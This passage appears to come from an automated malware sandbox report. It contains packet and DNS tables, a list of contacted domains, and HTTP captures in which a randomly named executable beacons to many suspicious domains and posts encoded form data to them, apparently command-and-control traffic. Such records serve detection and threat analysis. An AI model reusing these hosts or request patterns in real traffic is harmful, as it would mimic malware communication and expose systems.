                                                                                                                                  Oct 22, 2024 22:59:32.700885057 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.708102942 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:32.708183050 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.714939117 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:32.721434116 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.673523903 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.673578024 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.674797058 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:33.858424902 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:33.858558893 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:33.861151934 CEST5325180192.168.2.58.210.49.139
                                                                                                                                  Oct 22, 2024 22:59:33.866836071 CEST80532518.210.49.139192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.020716906 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:39.028614998 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.028695107 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:39.097224951 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:39.105146885 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.966202021 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:39.969207048 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:40.619889021 CEST5325280192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:40.625473976 CEST805325294.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:41.649879932 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:41.885962963 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:41.886123896 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:41.895153999 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:41.900768042 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:42.814241886 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:42.814443111 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:43.401194096 CEST5325380192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:43.406939983 CEST805325394.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:44.419796944 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:44.425292969 CEST805325494.23.162.163192.168.2.5
                                                                                                                                  Oct 22, 2024 22:59:44.425353050 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:44.436575890 CEST5325480192.168.2.594.23.162.163
                                                                                                                                  Oct 22, 2024 22:59:44.442254066 CEST805325494.23.162.163192.168.2.5
Oct 22, 2024 22:59:44.442262888 CEST | 80 | 53254 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:45.244168997 CEST | 80 | 53254 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:45.245233059 CEST | 53254 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:45.948040009 CEST | 53254 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:45.953541994 CEST | 80 | 53254 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:46.968178988 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:47.199269056 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:47.199366093 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:47.205121040 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:47.210652113 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035028934 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035088062 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035125017 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035202026 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035238028 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035271883 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035271883 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.035331964 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.035365105 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.035533905 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.375241995 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.375300884 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.375370026 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.375452995 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.375952959 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 22:59:48.375994921 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.377923965 CEST | 53255 | 80 | 192.168.2.5 | 94.23.162.163
Oct 22, 2024 22:59:48.383356094 CEST | 80 | 53255 | 94.23.162.163 | 192.168.2.5
Oct 22, 2024 23:00:04.568445921 CEST | 53256 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 23:00:04.574132919 CEST | 80 | 53256 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 23:00:04.574203014 CEST | 53256 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 23:00:04.581003904 CEST | 53256 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 23:00:04.586564064 CEST | 80 | 53256 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 23:00:05.305921078 CEST | 80 | 53256 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 23:00:05.307667017 CEST | 80 | 53256 | 188.114.97.3 | 192.168.2.5
Oct 22, 2024 23:00:05.311558008 CEST | 53256 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 23:00:05.312124968 CEST | 53256 | 80 | 192.168.2.5 | 188.114.97.3
Oct 22, 2024 23:00:05.317455053 CEST | 80 | 53256 | 188.114.97.3 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 22:56:21.159071922 CEST | 53 | 62539 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:56:22.783904076 CEST | 53 | 51786 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:56:24.807912111 CEST | 58062 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:56:24.816385984 CEST | 53 | 58062 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:56:30.043354034 CEST | 57080 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:56:30.057569027 CEST | 53 | 57080 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:56:45.958697081 CEST | 54109 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:56:46.378549099 CEST | 53 | 54109 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:57:00.060422897 CEST | 53826 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:57:00.069848061 CEST | 53 | 53826 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:57:08.139005899 CEST | 58203 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:57:08.449496984 CEST | 53 | 58203 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:57:21.937089920 CEST | 58927 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:57:21.968242884 CEST | 53 | 58927 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:57:35.687488079 CEST | 53034 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:57:35.706499100 CEST | 53 | 53034 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:57:49.083009958 CEST | 59498 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:57:49.134582043 CEST | 53 | 59498 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:58:02.732337952 CEST | 63724 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:58:02.771413088 CEST | 53 | 63724 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:58:16.357739925 CEST | 58710 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:58:16.664597988 CEST | 53 | 58710 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:58:30.221910954 CEST | 55556 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:58:30.235486031 CEST | 53 | 55556 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:58:43.655097961 CEST | 55815 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:58:43.733046055 CEST | 53 | 55815 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:58:57.373162985 CEST | 56695 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:58:57.502739906 CEST | 53 | 56695 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:59:10.968290091 CEST | 59559 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:59:10.988677025 CEST | 53 | 59559 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:59:24.373609066 CEST | 60272 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:59:25.064899921 CEST | 53 | 60272 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:59:38.900506973 CEST | 64501 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:59:38.955065012 CEST | 53 | 64501 | 1.1.1.1 | 192.168.2.5
Oct 22, 2024 22:59:53.389312029 CEST | 56508 | 53 | 192.168.2.5 | 1.1.1.1
Oct 22, 2024 22:59:53.406847000 CEST | 53 | 56508 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 22:56:24.807912111 CEST | 192.168.2.5 | 1.1.1.1 | 0xdb0a | Standard query (0) | 50.23.12.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 22, 2024 22:56:30.043354034 CEST | 192.168.2.5 | 1.1.1.1 | 0x685a | Standard query (0) | www.itemsort.shop | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:56:45.958697081 CEST | 192.168.2.5 | 1.1.1.1 | 0x4b3c | Standard query (0) | www.rudemyvague.info | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:00.060422897 CEST | 192.168.2.5 | 1.1.1.1 | 0xd5e9 | Standard query (0) | www.gws-treinamento2.shop | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:08.139005899 CEST | 192.168.2.5 | 1.1.1.1 | 0x8798 | Standard query (0) | www.sailforever.xyz | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:21.937089920 CEST | 192.168.2.5 | 1.1.1.1 | 0x6402 | Standard query (0) | www.launchdreamidea.xyz | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:35.687488079 CEST | 192.168.2.5 | 1.1.1.1 | 0x4376 | Standard query (0) | www.mondayigboleague.info | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:49.083009958 CEST | 192.168.2.5 | 1.1.1.1 | 0x9167 | Standard query (0) | www.stocksm.fun | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:02.732337952 CEST | 192.168.2.5 | 1.1.1.1 | 0xdb74 | Standard query (0) | www.drevohome.shop | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:16.357739925 CEST | 192.168.2.5 | 1.1.1.1 | 0x5ca8 | Standard query (0) | www.givingaway123.net | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:30.221910954 CEST | 192.168.2.5 | 1.1.1.1 | 0xe5b1 | Standard query (0) | www.jagdud.store | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:43.655097961 CEST | 192.168.2.5 | 1.1.1.1 | 0x4386 | Standard query (0) | www.030002837.xyz | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:57.373162985 CEST | 192.168.2.5 | 1.1.1.1 | 0xdee9 | Standard query (0) | www.ethetf.digital | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:10.968290091 CEST | 192.168.2.5 | 1.1.1.1 | 0xab9c | Standard query (0) | www.booosted.xyz | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:24.373609066 CEST | 192.168.2.5 | 1.1.1.1 | 0x19f2 | Standard query (0) | www.djazdgc.tokyo | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:38.900506973 CEST | 192.168.2.5 | 1.1.1.1 | 0xd90f | Standard query (0) | www.productanalytics.pro | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:53.389312029 CEST | 192.168.2.5 | 1.1.1.1 | 0xfc0f | Standard query (0) | www.kmjai8jf.icu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 22:56:24.816385984 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb0a | Name error (3) | 50.23.12.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 22, 2024 22:56:30.057569027 CEST | 1.1.1.1 | 192.168.2.5 | 0x685a | No error (0) | www.itemsort.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:56:30.057569027 CEST | 1.1.1.1 | 192.168.2.5 | 0x685a | No error (0) | www.itemsort.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:56:46.378549099 CEST | 1.1.1.1 | 192.168.2.5 | 0x4b3c | No error (0) | www.rudemyvague.info | | 52.13.151.179 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:00.069848061 CEST | 1.1.1.1 | 192.168.2.5 | 0xd5e9 | Name error (3) | www.gws-treinamento2.shop | none | none | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:08.449496984 CEST | 1.1.1.1 | 192.168.2.5 | 0x8798 | No error (0) | www.sailforever.xyz | | 103.106.67.112 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:21.968242884 CEST | 1.1.1.1 | 192.168.2.5 | 0x6402 | No error (0) | www.launchdreamidea.xyz | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:21.968242884 CEST | 1.1.1.1 | 192.168.2.5 | 0x6402 | No error (0) | www.launchdreamidea.xyz | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:35.706499100 CEST | 1.1.1.1 | 192.168.2.5 | 0x4376 | No error (0) | www.mondayigboleague.info | mondayigboleague.info | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 22:57:35.706499100 CEST | 1.1.1.1 | 192.168.2.5 | 0x4376 | No error (0) | mondayigboleague.info | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:35.706499100 CEST | 1.1.1.1 | 192.168.2.5 | 0x4376 | No error (0) | mondayigboleague.info | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:57:49.134582043 CEST | 1.1.1.1 | 192.168.2.5 | 0x9167 | No error (0) | www.stocksm.fun | webredir.vip.gandi.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 22:57:49.134582043 CEST | 1.1.1.1 | 192.168.2.5 | 0x9167 | No error (0) | webredir.vip.gandi.net | | 217.70.184.50 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:02.771413088 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb74 | No error (0) | www.drevohome.shop | | 94.23.162.163 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:16.664597988 CEST | 1.1.1.1 | 192.168.2.5 | 0x5ca8 | No error (0) | www.givingaway123.net | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:30.235486031 CEST | 1.1.1.1 | 192.168.2.5 | 0xe5b1 | No error (0) | www.jagdud.store | | 209.74.64.187 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:43.733046055 CEST | 1.1.1.1 | 192.168.2.5 | 0x4386 | No error (0) | www.030002837.xyz | 030002837.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 22:58:43.733046055 CEST | 1.1.1.1 | 192.168.2.5 | 0x4386 | No error (0) | 030002837.xyz | | 65.21.196.90 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:57.502739906 CEST | 1.1.1.1 | 192.168.2.5 | 0xdee9 | No error (0) | www.ethetf.digital | ethetf.digital | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 22:58:57.502739906 CEST | 1.1.1.1 | 192.168.2.5 | 0xdee9 | No error (0) | ethetf.digital | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:58:57.502739906 CEST | 1.1.1.1 | 192.168.2.5 | 0xdee9 | No error (0) | ethetf.digital | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:10.988677025 CEST | 1.1.1.1 | 192.168.2.5 | 0xab9c | No error (0) | www.booosted.xyz | booosted.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 22:59:10.988677025 CEST | 1.1.1.1 | 192.168.2.5 | 0xab9c | No error (0) | booosted.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:10.988677025 CEST | 1.1.1.1 | 192.168.2.5 | 0xab9c | No error (0) | booosted.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:25.064899921 CEST | 1.1.1.1 | 192.168.2.5 | 0x19f2 | No error (0) | www.djazdgc.tokyo | longg002.cn | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 22:59:25.064899921 CEST | 1.1.1.1 | 192.168.2.5 | 0x19f2 | No error (0) | longg002.cn | | 8.210.49.139 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:38.955065012 CEST | 1.1.1.1 | 192.168.2.5 | 0xd90f | No error (0) | www.productanalytics.pro | | 94.23.162.163 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 22:59:53.406847000 CEST | 1.1.1.1 | 192.168.2.5 | 0xfc0f | Name error (3) | www.kmjai8jf.icu | none | none | A (IP address) | IN (0x0001) | false
• www.itemsort.shop
• www.rudemyvague.info
• www.sailforever.xyz
• www.launchdreamidea.xyz
• www.mondayigboleague.info
• www.stocksm.fun
• www.drevohome.shop
• www.givingaway123.net
• www.jagdud.store
• www.030002837.xyz
• www.ethetf.digital
• www.booosted.xyz
• www.djazdgc.tokyo
• www.productanalytics.pro
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 52994 | 188.114.97.3 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:56:30.081974983 CEST | 482 | OUT | GET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1
Host: www.itemsort.shop
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 22, 2024 22:56:30.780865908 CEST | 926 | IN | HTTP/1.1 404
Date: Tue, 22 Oct 2024 20:56:30 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VmaJFU7OhhnRrG6krxVvNUci44lwd94hP2%2BCfpftvjC3I1D3rFvmjxEfaOMqNf6S7LmikDGMEwavla6JnbrGFp%2BeC676Cr%2F9ahnnL5zjE0dWNSCMjOmvyFgEf2OVtO32zbRoug%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d6c64f75fb2e52c-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 53065 | 52.13.151.179 | 80 | 1536 | C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 22:56:46.405811071 CEST | 756 | OUT | POST /t7t4/ HTTP/1.1
                                                                                                                                  Host: www.rudemyvague.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Origin: http://www.rudemyvague.info
                                                                                                                                  Referer: http://www.rudemyvague.info/t7t4/
                                                                                                                                  Content-Length: 206
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Data Raw: 44 72 65 6c 48 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 55 54 7a 48 5a 2f 52 50 4f 65 6e 59 30 73 5a 54 4d 49 30 4b 6e 59 44 72 2b 6b 6c 4a 47 6b 6c 4e 42 6f 6e 2b 52 77 3d
                                                                                                                                  Data Ascii: DrelH=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFAScUTzHZ/RPOenY0sZTMI0KnYDr+klJGklNBon+Rw=
Oct 22, 2024 22:56:47.091773987 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.10.3
                                                                                                                                  Date: Tue, 22 Oct 2024 20:56:47 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  X-Powered-By: PHP/5.3.3
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                  Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                  Permissions-Policy: geolocation=(), microphone=()
                                                                                                                                  Expires: 0
                                                                                                                                  Content-Encoding: gzip
                                                                                                                                  Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                                                                  Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wSV#QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
Oct 22, 2024 22:56:47.091932058 CEST | 106 | IN | Data Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                                                                  Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
